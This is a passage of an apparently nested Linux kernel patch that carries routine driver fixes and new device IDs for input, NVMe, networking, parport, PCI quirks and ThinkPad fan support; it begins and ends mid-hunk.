++		if (ctlr->imu_cal_accel_divisor[i] == 0) {
++			ctlr->imu_cal_accel_divisor[i] = 1;
++			divz++;
++		}
++
++		if (ctlr->imu_cal_gyro_divisor[i] == 0) {
++			ctlr->imu_cal_gyro_divisor[i] = 1;
++			divz++;
++		}
+ 	}
++
++	if (divz)
++		hid_warn(ctlr->hdev, "inaccurate IMU divisors (%d)\n", divz);
+ }
+ 
+ static const s16 DFLT_ACCEL_OFFSET /*= 0*/;
+@@ -1095,16 +1108,16 @@ static void joycon_parse_imu_report(struct joycon_ctlr *ctlr,
+ 		    JC_IMU_SAMPLES_PER_DELTA_AVG) {
+ 			ctlr->imu_avg_delta_ms = ctlr->imu_delta_samples_sum /
+ 						 ctlr->imu_delta_samples_count;
+-			/* don't ever want divide by zero shenanigans */
+-			if (ctlr->imu_avg_delta_ms == 0) {
+-				ctlr->imu_avg_delta_ms = 1;
+-				hid_warn(ctlr->hdev,
+-					 "calculated avg imu delta of 0\n");
+-			}
+ 			ctlr->imu_delta_samples_count = 0;
+ 			ctlr->imu_delta_samples_sum = 0;
+ 		}
+ 
++		/* don't ever want divide by zero shenanigans */
++		if (ctlr->imu_avg_delta_ms == 0) {
++			ctlr->imu_avg_delta_ms = 1;
++			hid_warn(ctlr->hdev, "calculated avg imu delta of 0\n");
++		}
++
+ 		/* useful for debugging IMU sample rate */
+ 		hid_dbg(ctlr->hdev,
+ 			"imu_report: ms=%u last_ms=%u delta=%u avg_delta=%u\n",
+diff --git a/drivers/hwmon/corsair-psu.c b/drivers/hwmon/corsair-psu.c
+index 2210aa62e3d06..ec7f27a6ce016 100644
+--- a/drivers/hwmon/corsair-psu.c
++++ b/drivers/hwmon/corsair-psu.c
+@@ -837,7 +837,23 @@ static struct hid_driver corsairpsu_driver = {
+ 	.reset_resume	= corsairpsu_resume,
+ #endif
+ };
+-module_hid_driver(corsairpsu_driver);
++
++static int __init corsair_init(void)
++{
++	return hid_register_driver(&corsairpsu_driver);
++}
++
++static void __exit corsair_exit(void)
++{
++	hid_unregister_driver(&corsairpsu_driver);
++}
++
++/*
++ * With module_init() the driver would load before the HID bus when
++ * built-in, so use late_initcall() instead.
++ */
++late_initcall(corsair_init);
++module_exit(corsair_exit);
+ 
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Wilken Gottwalt <wilken.gottwalt@posteo.net>");
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index 0174fbf1a9637..d8e4d902b01ad 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -1032,7 +1032,7 @@ struct etmv4_drvdata {
+ 	u8				ctxid_size;
+ 	u8				vmid_size;
+ 	u8				ccsize;
+-	u8				ccitmin;
++	u16				ccitmin;
+ 	u8				s_ex_level;
+ 	u8				ns_ex_level;
+ 	u8				q_support;
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 016220ba0addd..8d8fa8e8afe04 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -342,9 +342,9 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 		return ret;
+ 
+ 	hisi_ptt->trace_irq = pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ);
+-	ret = devm_request_threaded_irq(&pdev->dev, hisi_ptt->trace_irq,
+-					NULL, hisi_ptt_isr, 0,
+-					DRV_NAME, hisi_ptt);
++	ret = devm_request_irq(&pdev->dev, hisi_ptt->trace_irq, hisi_ptt_isr,
++				IRQF_NOBALANCING | IRQF_NO_THREAD, DRV_NAME,
++				hisi_ptt);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to request irq %d, ret = %d\n",
+ 			hisi_ptt->trace_irq, ret);
+@@ -659,6 +659,9 @@ static int hisi_ptt_pmu_event_init(struct perf_event *event)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	if (event->attach_state & PERF_ATTACH_TASK)
++		return -EOPNOTSUPP;
++
+ 	if (event->attr.type != hisi_ptt->hisi_ptt_pmu.type)
+ 		return -ENOENT;
+ 
+diff --git a/drivers/i2c/busses/i2c-rk3x.c b/drivers/i2c/busses/i2c-rk3x.c
+index b31cf4f18f854..6aa4f1f062401 100644
+--- a/drivers/i2c/busses/i2c-rk3x.c
++++ b/drivers/i2c/busses/i2c-rk3x.c
+@@ -178,6 +178,7 @@ struct rk3x_i2c_soc_data {
+  * @clk: function clk for rk3399 or function & Bus clks for others
+  * @pclk: Bus clk for rk3399
+  * @clk_rate_nb: i2c clk rate change notify
++ * @irq: irq number
+  * @t: I2C known timing information
+  * @lock: spinlock for the i2c bus
+  * @wait: the waitqueue to wait for i2c transfer
+@@ -200,6 +201,7 @@ struct rk3x_i2c {
+ 	struct clk *clk;
+ 	struct clk *pclk;
+ 	struct notifier_block clk_rate_nb;
++	int irq;
+ 
+ 	/* Settings */
+ 	struct i2c_timings t;
+@@ -1087,13 +1089,18 @@ static int rk3x_i2c_xfer_common(struct i2c_adapter *adap,
+ 
+ 		spin_unlock_irqrestore(&i2c->lock, flags);
+ 
+-		rk3x_i2c_start(i2c);
+-
+ 		if (!polling) {
++			rk3x_i2c_start(i2c);
++
+ 			timeout = wait_event_timeout(i2c->wait, !i2c->busy,
+ 						     msecs_to_jiffies(WAIT_TIMEOUT));
+ 		} else {
++			disable_irq(i2c->irq);
++			rk3x_i2c_start(i2c);
++
+ 			timeout = rk3x_i2c_wait_xfer_poll(i2c);
++
++			enable_irq(i2c->irq);
+ 		}
+ 
+ 		spin_lock_irqsave(&i2c->lock, flags);
+@@ -1310,6 +1317,8 @@ static int rk3x_i2c_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	i2c->irq = irq;
++
+ 	platform_set_drvdata(pdev, i2c);
+ 
+ 	if (i2c->soc_data->calc_timings == rk3x_i2c_v0_calc_timings) {
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 8404286302b0c..e8011d70d0799 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -286,6 +286,7 @@ static const struct xpad_device {
+ 	{ 0x146b, 0x0604, "Bigben Interactive DAIJA Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOX360 },
+ 	{ 0x1532, 0x0a00, "Razer Atrox Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOXONE },
+ 	{ 0x1532, 0x0a03, "Razer Wildcat", 0, XTYPE_XBOXONE },
++	{ 0x1532, 0x0a29, "Razer Wolverine V2", 0, XTYPE_XBOXONE },
+ 	{ 0x15e4, 0x3f00, "Power A Mini Pro Elite", 0, XTYPE_XBOX360 },
+ 	{ 0x15e4, 0x3f0a, "Xbox Airflo wired controller", 0, XTYPE_XBOX360 },
+ 	{ 0x15e4, 0x3f10, "Batarang Xbox 360 controller", 0, XTYPE_XBOX360 },
+diff --git a/drivers/input/keyboard/atkbd.c b/drivers/input/keyboard/atkbd.c
+index 246958795f606..e1e4f1133296a 100644
+--- a/drivers/input/keyboard/atkbd.c
++++ b/drivers/input/keyboard/atkbd.c
+@@ -746,6 +746,44 @@ static void atkbd_deactivate(struct atkbd *atkbd)
+ 			ps2dev->serio->phys);
+ }
+ 
++#ifdef CONFIG_X86
++static bool atkbd_is_portable_device(void)
++{
++	static const char * const chassis_types[] = {
++		"8",	/* Portable */
++		"9",	/* Laptop */
++		"10",	/* Notebook */
++		"14",	/* Sub-Notebook */
++		"31",	/* Convertible */
++		"32",	/* Detachable */
++	};
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(chassis_types); i++)
++		if (dmi_match(DMI_CHASSIS_TYPE, chassis_types[i]))
++			return true;
++
++	return false;
++}
++
++/*
++ * On many modern laptops ATKBD_CMD_GETID may cause problems, on these laptops
++ * the controller is always in translated mode. In this mode mice/touchpads will
++ * not work. So in this case simply assume a keyboard is connected to avoid
++ * confusing some laptop keyboards.
++ *
++ * Skipping ATKBD_CMD_GETID ends up using a fake keyboard id. Using a fake id is
++ * ok in translated mode, only atkbd_select_set() checks atkbd->id and in
++ * translated mode that is a no-op.
++ */
++static bool atkbd_skip_getid(struct atkbd *atkbd)
++{
++	return atkbd->translated && atkbd_is_portable_device();
++}
++#else
++static inline bool atkbd_skip_getid(struct atkbd *atkbd) { return false; }
++#endif
++
+ /*
+  * atkbd_probe() probes for an AT keyboard on a serio port.
+  */
+@@ -775,12 +813,12 @@ static int atkbd_probe(struct atkbd *atkbd)
+  */
+ 
+ 	param[0] = param[1] = 0xa5;	/* initialize with invalid values */
+-	if (ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
++	if (atkbd_skip_getid(atkbd) || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
+ 
+ /*
+- * If the get ID command failed, we check if we can at least set the LEDs on
+- * the keyboard. This should work on every keyboard out there. It also turns
+- * the LEDs off, which we want anyway.
++ * If the get ID command was skipped or failed, we check if we can at least set
++ * the LEDs on the keyboard. This should work on every keyboard out there.
++ * It also turns the LEDs off, which we want anyway.
+  */
+ 		param[0] = 0;
+ 		if (ps2_command(ps2dev, param, ATKBD_CMD_SETLEDS))
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index e43e93ac2798a..b6749af462620 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -183,6 +183,7 @@ static const char * const smbus_pnp_ids[] = {
+ 	"LEN009b", /* T580 */
+ 	"LEN0402", /* X1 Extreme Gen 2 / P1 Gen 2 */
+ 	"LEN040f", /* P1 Gen 3 */
++	"LEN0411", /* L14 Gen 1 */
+ 	"LEN200f", /* T450s */
+ 	"LEN2044", /* L470  */
+ 	"LEN2054", /* E480 */
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 9c39553d30fa2..b585b1dab870e 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -360,6 +360,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_DRITEK)
+ 	},
++	{
++		/* Acer TravelMate P459-G2-M */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "TravelMate P459-G2-M"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Amoi M636/A737 */
+ 		.matches = {
+diff --git a/drivers/leds/trigger/ledtrig-tty.c b/drivers/leds/trigger/ledtrig-tty.c
+index 8ae0d2d284aff..3e69a7bde9284 100644
+--- a/drivers/leds/trigger/ledtrig-tty.c
++++ b/drivers/leds/trigger/ledtrig-tty.c
+@@ -168,6 +168,10 @@ static void ledtrig_tty_deactivate(struct led_classdev *led_cdev)
+ 
+ 	cancel_delayed_work_sync(&trigger_data->dwork);
+ 
++	kfree(trigger_data->ttyname);
++	tty_kref_put(trigger_data->tty);
++	trigger_data->tty = NULL;
++
+ 	kfree(trigger_data);
+ }
+ 
+diff --git a/drivers/md/Kconfig b/drivers/md/Kconfig
+index 662d219c39bf4..db0e97020256e 100644
+--- a/drivers/md/Kconfig
++++ b/drivers/md/Kconfig
+@@ -650,6 +650,7 @@ config DM_ZONED
+ 
+ config DM_AUDIT
+ 	bool "DM audit events"
++	depends on BLK_DEV_DM
+ 	depends on AUDIT
+ 	help
+ 	  Generate audit events for device-mapper.
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index e4564ca1f2434..f7783199f81d4 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -36,7 +36,6 @@
+  */
+ 
+ #include <linux/blkdev.h>
+-#include <linux/delay.h>
+ #include <linux/kthread.h>
+ #include <linux/raid/pq.h>
+ #include <linux/async_tx.h>
+@@ -6833,18 +6832,7 @@ static void raid5d(struct md_thread *thread)
+ 			spin_unlock_irq(&conf->device_lock);
+ 			md_check_recovery(mddev);
+ 			spin_lock_irq(&conf->device_lock);
+-
+-			/*
+-			 * Waiting on MD_SB_CHANGE_PENDING below may deadlock
+-			 * seeing md_check_recovery() is needed to clear
+-			 * the flag when using mdmon.
+-			 */
+-			continue;
+ 		}
+-
+-		wait_event_lock_irq(mddev->sb_wait,
+-			!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags),
+-			conf->device_lock);
+ 	}
+ 	pr_debug("%d stripes handled\n", handled);
+ 
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index f60a16de565ed..0c694ab3c110c 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -6447,6 +6447,14 @@ static void tg3_dump_state(struct tg3 *tp)
+ 	int i;
+ 	u32 *regs;
+ 
++	/* If it is a PCI error, all registers will be 0xffff,
++	 * we don't dump them out, just report the error and return
++	 */
++	if (tp->pdev->error_state != pci_channel_io_normal) {
++		netdev_err(tp->dev, "PCI channel ERROR!\n");
++		return;
++	}
++
+ 	regs = kzalloc(TG3_REG_BLK_SIZE, GFP_ATOMIC);
+ 	if (!regs)
+ 		return;
+@@ -11184,7 +11192,8 @@ static void tg3_reset_task(struct work_struct *work)
+ 	rtnl_lock();
+ 	tg3_full_lock(tp, 0);
+ 
+-	if (tp->pcierr_recovery || !netif_running(tp->dev)) {
++	if (tp->pcierr_recovery || !netif_running(tp->dev) ||
++	    tp->pdev->error_state != pci_channel_io_normal) {
+ 		tg3_flag_clear(tp, RESET_TASK_PENDING);
+ 		tg3_full_unlock(tp);
+ 		rtnl_unlock();
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+index 49c7aa86faaa8..e129ee1020f0a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+@@ -59,11 +59,6 @@ static int loongson_dwmac_probe(struct pci_dev *pdev, const struct pci_device_id
+ 		return -ENODEV;
+ 	}
+ 
+-	if (!of_device_is_compatible(np, "loongson, pci-gmac")) {
+-		pr_info("dwmac_loongson_pci: Incompatible OF node\n");
+-		return -ENODEV;
+-	}
+-
+ 	plat = devm_kzalloc(&pdev->dev, sizeof(*plat), GFP_KERNEL);
+ 	if (!plat)
+ 		return -ENOMEM;
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index 57a11ee05bc36..91b73e7a41134 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1381,7 +1381,7 @@ static void iwl_pcie_rx_handle_rb(struct iwl_trans *trans,
+ 		 * if it is true then one of the handlers took the page.
+ 		 */
+ 
+-		if (reclaim) {
++		if (reclaim && txq) {
+ 			u16 sequence = le16_to_cpu(pkt->hdr.sequence);
+ 			int index = SEQ_TO_INDEX(sequence);
+ 			int cmd_index = iwl_txq_get_cmd_index(txq, index);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 5b906dbb1096c..0c088db944706 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1511,7 +1511,8 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 	if (id->ncap == 0) {
+ 		/* namespace not allocated or attached */
+ 		info->is_removed = true;
+-		return -ENODEV;
++		ret = -ENODEV;
++		goto error;
+ 	}
+ 
+ 	info->anagrpid = id->anagrpid;
+@@ -1529,8 +1530,10 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 		    !memchr_inv(ids->nguid, 0, sizeof(ids->nguid)))
+ 			memcpy(ids->nguid, id->nguid, sizeof(ids->nguid));
+ 	}
++
++error:
+ 	kfree(id);
+-	return 0;
++	return ret;
+ }
+ 
+ static int nvme_ns_info_from_id_cs_indep(struct nvme_ctrl *ctrl,
+@@ -1922,9 +1925,10 @@ static void nvme_update_disk_info(struct gendisk *disk,
+ 
+ 	/*
+ 	 * The block layer can't support LBA sizes larger than the page size
+-	 * yet, so catch this early and don't allow block I/O.
++	 * or smaller than a sector size yet, so catch this early and don't
++	 * allow block I/O.
+ 	 */
+-	if (ns->lba_shift > PAGE_SHIFT) {
++	if (ns->lba_shift > PAGE_SHIFT || ns->lba_shift < SECTOR_SHIFT) {
+ 		capacity = 0;
+ 		bs = (1 << 9);
+ 	}
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 118bf08a708b9..a892d679e3389 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -382,6 +382,11 @@ struct nvme_ctrl {
+ 	enum nvme_dctype dctype;
+ };
+ 
++static inline enum nvme_ctrl_state nvme_ctrl_state(struct nvme_ctrl *ctrl)
++{
++	return READ_ONCE(ctrl->state);
++}
++
+ enum nvme_iopolicy {
+ 	NVME_IOPOLICY_NUMA,
+ 	NVME_IOPOLICY_RR,
+diff --git a/drivers/nvme/target/configfs.c b/drivers/nvme/target/configfs.c
+index 6a2816f3b4e80..73ae16059a1cb 100644
+--- a/drivers/nvme/target/configfs.c
++++ b/drivers/nvme/target/configfs.c
+@@ -16,6 +16,7 @@
+ #endif
+ #include <crypto/hash.h>
+ #include <crypto/kpp.h>
++#include <linux/nospec.h>
+ 
+ #include "nvmet.h"
+ 
+@@ -508,6 +509,7 @@ static ssize_t nvmet_ns_ana_grpid_store(struct config_item *item,
+ 
+ 	down_write(&nvmet_ana_sem);
+ 	oldgrpid = ns->anagrpid;
++	newgrpid = array_index_nospec(newgrpid, NVMET_MAX_ANAGRPS);
+ 	nvmet_ana_group_enabled[newgrpid]++;
+ 	ns->anagrpid = newgrpid;
+ 	nvmet_ana_group_enabled[oldgrpid]--;
+@@ -1580,6 +1582,7 @@ static struct config_group *nvmet_ana_groups_make_group(
+ 	grp->grpid = grpid;
+ 
+ 	down_write(&nvmet_ana_sem);
++	grpid = array_index_nospec(grpid, NVMET_MAX_ANAGRPS);
+ 	nvmet_ana_group_enabled[grpid]++;
+ 	up_write(&nvmet_ana_sem);
+ 
+diff --git a/drivers/parport/parport_serial.c b/drivers/parport/parport_serial.c
+index 9f5d784cd95d5..3644997a83425 100644
+--- a/drivers/parport/parport_serial.c
++++ b/drivers/parport/parport_serial.c
+@@ -65,6 +65,10 @@ enum parport_pc_pci_cards {
+ 	sunix_5069a,
+ 	sunix_5079a,
+ 	sunix_5099a,
++	brainboxes_uc257,
++	brainboxes_is300,
++	brainboxes_uc414,
++	brainboxes_px263,
+ };
+ 
+ /* each element directly indexed from enum list, above */
+@@ -158,6 +162,10 @@ static struct parport_pc_pci cards[] = {
+ 	/* sunix_5069a */		{ 1, { { 1, 2 }, } },
+ 	/* sunix_5079a */		{ 1, { { 1, 2 }, } },
+ 	/* sunix_5099a */		{ 1, { { 1, 2 }, } },
++	/* brainboxes_uc257 */	{ 1, { { 3, -1 }, } },
++	/* brainboxes_is300 */	{ 1, { { 3, -1 }, } },
++	/* brainboxes_uc414 */  { 1, { { 3, -1 }, } },
++	/* brainboxes_px263 */	{ 1, { { 3, -1 }, } },
+ };
+ 
+ static struct pci_device_id parport_serial_pci_tbl[] = {
+@@ -277,6 +285,38 @@ static struct pci_device_id parport_serial_pci_tbl[] = {
+ 	{ PCI_VENDOR_ID_SUNIX, PCI_DEVICE_ID_SUNIX_1999, PCI_VENDOR_ID_SUNIX,
+ 	  0x0104, 0, 0, sunix_5099a },
+ 
++	/* Brainboxes UC-203 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0bc1,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0bc2,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++
++	/* Brainboxes UC-257 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0861,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0862,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0863,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++
++	/* Brainboxes UC-414 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0e61,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc414 },
++
++	/* Brainboxes UC-475 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0981,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0982,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++
++	/* Brainboxes IS-300/IS-500 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0da0,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_is300 },
++
++	/* Brainboxes PX-263/PX-295 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x402c,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_px263 },
++
+ 	{ 0, } /* terminate list */
+ };
+ MODULE_DEVICE_TABLE(pci,parport_serial_pci_tbl);
+@@ -542,6 +582,30 @@ static struct pciserial_board pci_parport_serial_boards[] = {
+ 		.base_baud      = 921600,
+ 		.uart_offset	= 0x8,
+ 	},
++	[brainboxes_uc257] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 2,
++		.base_baud	= 115200,
++		.uart_offset	= 8,
++	},
++	[brainboxes_is300] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 1,
++		.base_baud	= 115200,
++		.uart_offset	= 8,
++	},
++	[brainboxes_uc414] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 4,
++		.base_baud	= 115200,
++		.uart_offset	= 8,
++	},
++	[brainboxes_px263] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 4,
++		.base_baud	= 921600,
++		.uart_offset	= 8,
++	},
+ };
+ 
+ struct parport_serial_private {
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index c132839d99dc8..8765544bac35c 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4602,17 +4602,21 @@ static int pci_quirk_xgene_acs(struct pci_dev *dev, u16 acs_flags)
+  * But the implementation could block peer-to-peer transactions between them
+  * and provide ACS-like functionality.
+  */
+-static int  pci_quirk_zhaoxin_pcie_ports_acs(struct pci_dev *dev, u16 acs_flags)
++static int pci_quirk_zhaoxin_pcie_ports_acs(struct pci_dev *dev, u16 acs_flags)
+ {
+ 	if (!pci_is_pcie(dev) ||
+ 	    ((pci_pcie_type(dev) != PCI_EXP_TYPE_ROOT_PORT) &&
+ 	     (pci_pcie_type(dev) != PCI_EXP_TYPE_DOWNSTREAM)))
+ 		return -ENOTTY;
+ 
++	/*
++	 * Future Zhaoxin Root Ports and Switch Downstream Ports will
++	 * implement ACS capability in accordance with the PCIe Spec.
++	 */
+ 	switch (dev->device) {
+ 	case 0x0710 ... 0x071e:
+ 	case 0x0721:
+-	case 0x0723 ... 0x0732:
++	case 0x0723 ... 0x0752:
+ 		return pci_acs_ctrl_enabled(acs_flags,
+ 			PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
+ 	}
+diff --git a/drivers/pinctrl/cirrus/Kconfig b/drivers/pinctrl/cirrus/Kconfig
+index 530426a74f751..b3cea8d56c4f6 100644
+--- a/drivers/pinctrl/cirrus/Kconfig
++++ b/drivers/pinctrl/cirrus/Kconfig
+@@ -1,7 +1,8 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ config PINCTRL_LOCHNAGAR
+ 	tristate "Cirrus Logic Lochnagar pinctrl driver"
+-	depends on MFD_LOCHNAGAR
++	# Avoid clash caused by MIPS defining RST, which is used in the driver
++	depends on MFD_LOCHNAGAR && !MIPS
+ 	select GPIOLIB
+ 	select PINMUX
+ 	select PINCONF
+diff --git a/drivers/pinctrl/pinctrl-cy8c95x0.c b/drivers/pinctrl/pinctrl-cy8c95x0.c
+index 68509a2301b8f..5abab6bc763ae 100644
+--- a/drivers/pinctrl/pinctrl-cy8c95x0.c
++++ b/drivers/pinctrl/pinctrl-cy8c95x0.c
+@@ -749,6 +749,8 @@ static int cy8c95x0_gpio_get_pincfg(struct cy8c95x0_pinctrl *chip,
+ 	ret = regmap_read(chip->regmap, reg, &reg_val);
+ 	if (reg_val & bit)
+ 		arg = 1;
++	if (param == PIN_CONFIG_OUTPUT_ENABLE)
++		arg = !arg;
+ 
+ 	*config = pinconf_to_config_packed(param, (u16)arg);
+ out:
+@@ -857,7 +859,7 @@ static int cy8c95x0_setup_gpiochip(struct cy8c95x0_pinctrl *chip)
+ 	gc->get_direction = cy8c95x0_gpio_get_direction;
+ 	gc->get_multiple = cy8c95x0_gpio_get_multiple;
+ 	gc->set_multiple = cy8c95x0_gpio_set_multiple;
+-	gc->set_config = gpiochip_generic_config,
++	gc->set_config = gpiochip_generic_config;
+ 	gc->can_sleep = true;
+ 	gc->add_pin_ranges = cy8c95x0_add_pin_ranges;
+ 
+diff --git a/drivers/platform/x86/intel/vbtn.c b/drivers/platform/x86/intel/vbtn.c
+index c5e4e35c8d204..8e2b07ed2ce94 100644
+--- a/drivers/platform/x86/intel/vbtn.c
++++ b/drivers/platform/x86/intel/vbtn.c
+@@ -73,10 +73,10 @@ struct intel_vbtn_priv {
+ 	bool wakeup_mode;
+ };
+ 
+-static void detect_tablet_mode(struct platform_device *device)
++static void detect_tablet_mode(struct device *dev)
+ {
+-	struct intel_vbtn_priv *priv = dev_get_drvdata(&device->dev);
+-	acpi_handle handle = ACPI_HANDLE(&device->dev);
++	struct intel_vbtn_priv *priv = dev_get_drvdata(dev);
++	acpi_handle handle = ACPI_HANDLE(dev);
+ 	unsigned long long vgbs;
+ 	acpi_status status;
+ 	int m;
+@@ -89,6 +89,8 @@ static void detect_tablet_mode(struct platform_device *device)
+ 	input_report_switch(priv->switches_dev, SW_TABLET_MODE, m);
+ 	m = (vgbs & VGBS_DOCK_MODE_FLAG) ? 1 : 0;
+ 	input_report_switch(priv->switches_dev, SW_DOCK, m);
++
++	input_sync(priv->switches_dev);
+ }
+ 
+ /*
+@@ -134,7 +136,7 @@ static int intel_vbtn_input_setup(struct platform_device *device)
+ 	priv->switches_dev->id.bustype = BUS_HOST;
+ 
+ 	if (priv->has_switches) {
+-		detect_tablet_mode(device);
++		detect_tablet_mode(&device->dev);
+ 
+ 		ret = input_register_device(priv->switches_dev);
+ 		if (ret)
+@@ -198,6 +200,9 @@ static void notify_handler(acpi_handle handle, u32 event, void *context)
+ 	autorelease = val && (!ke_rel || ke_rel->type == KE_IGNORE);
+ 
+ 	sparse_keymap_report_event(input_dev, event, val, autorelease);
++
++	/* Some devices need this to report further events */
++	acpi_evaluate_object(handle, "VBDL", NULL, NULL);
+ }
+ 
+ /*
+@@ -358,7 +363,13 @@ static void intel_vbtn_pm_complete(struct device *dev)
+ 
+ static int intel_vbtn_pm_resume(struct device *dev)
+ {
++	struct intel_vbtn_priv *priv = dev_get_drvdata(dev);
++
+ 	intel_vbtn_pm_complete(dev);
++
++	if (priv->has_switches)
++		detect_tablet_mode(dev);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 05a55bc31c796..6edd2e294750e 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -8149,8 +8149,19 @@ static struct ibm_struct volume_driver_data = {
+  * 	TPACPI_FAN_WR_TPEC is also available and should be used to
+  * 	command the fan.  The X31/X40/X41 seems to have 8 fan levels,
+  * 	but the ACPI tables just mention level 7.
++ *
++ * TPACPI_FAN_RD_TPEC_NS:
++ *	This mode is used for a few ThinkPads (L13 Yoga Gen2, X13 Yoga Gen2 etc.)
++ *	that are using non-standard EC locations for reporting fan speeds.
++ *	Currently these platforms only provide fan rpm reporting.
++ *
+  */
+ 
++#define FAN_RPM_CAL_CONST 491520	/* FAN RPM calculation offset for some non-standard ECFW */
++
++#define FAN_NS_CTRL_STATUS	BIT(2)		/* Bit which determines control is enabled or not */
++#define FAN_NS_CTRL		BIT(4)		/* Bit which determines control is by host or EC */
++
+ enum {					/* Fan control constants */
+ 	fan_status_offset = 0x2f,	/* EC register 0x2f */
+ 	fan_rpm_offset = 0x84,		/* EC register 0x84: LSB, 0x85 MSB (RPM)
+@@ -8158,6 +8169,11 @@ enum {					/* Fan control constants */
+ 	fan_select_offset = 0x31,	/* EC register 0x31 (Firmware 7M)
+ 					   bit 0 selects which fan is active */
+ 
++	fan_status_offset_ns = 0x93,	/* Special status/control offset for non-standard EC Fan1 */
++	fan2_status_offset_ns = 0x96,	/* Special status/control offset for non-standard EC Fan2 */
++	fan_rpm_status_ns = 0x95,	/* Special offset for Fan1 RPM status for non-standard EC */
++	fan2_rpm_status_ns = 0x98,	/* Special offset for Fan2 RPM status for non-standard EC */
++
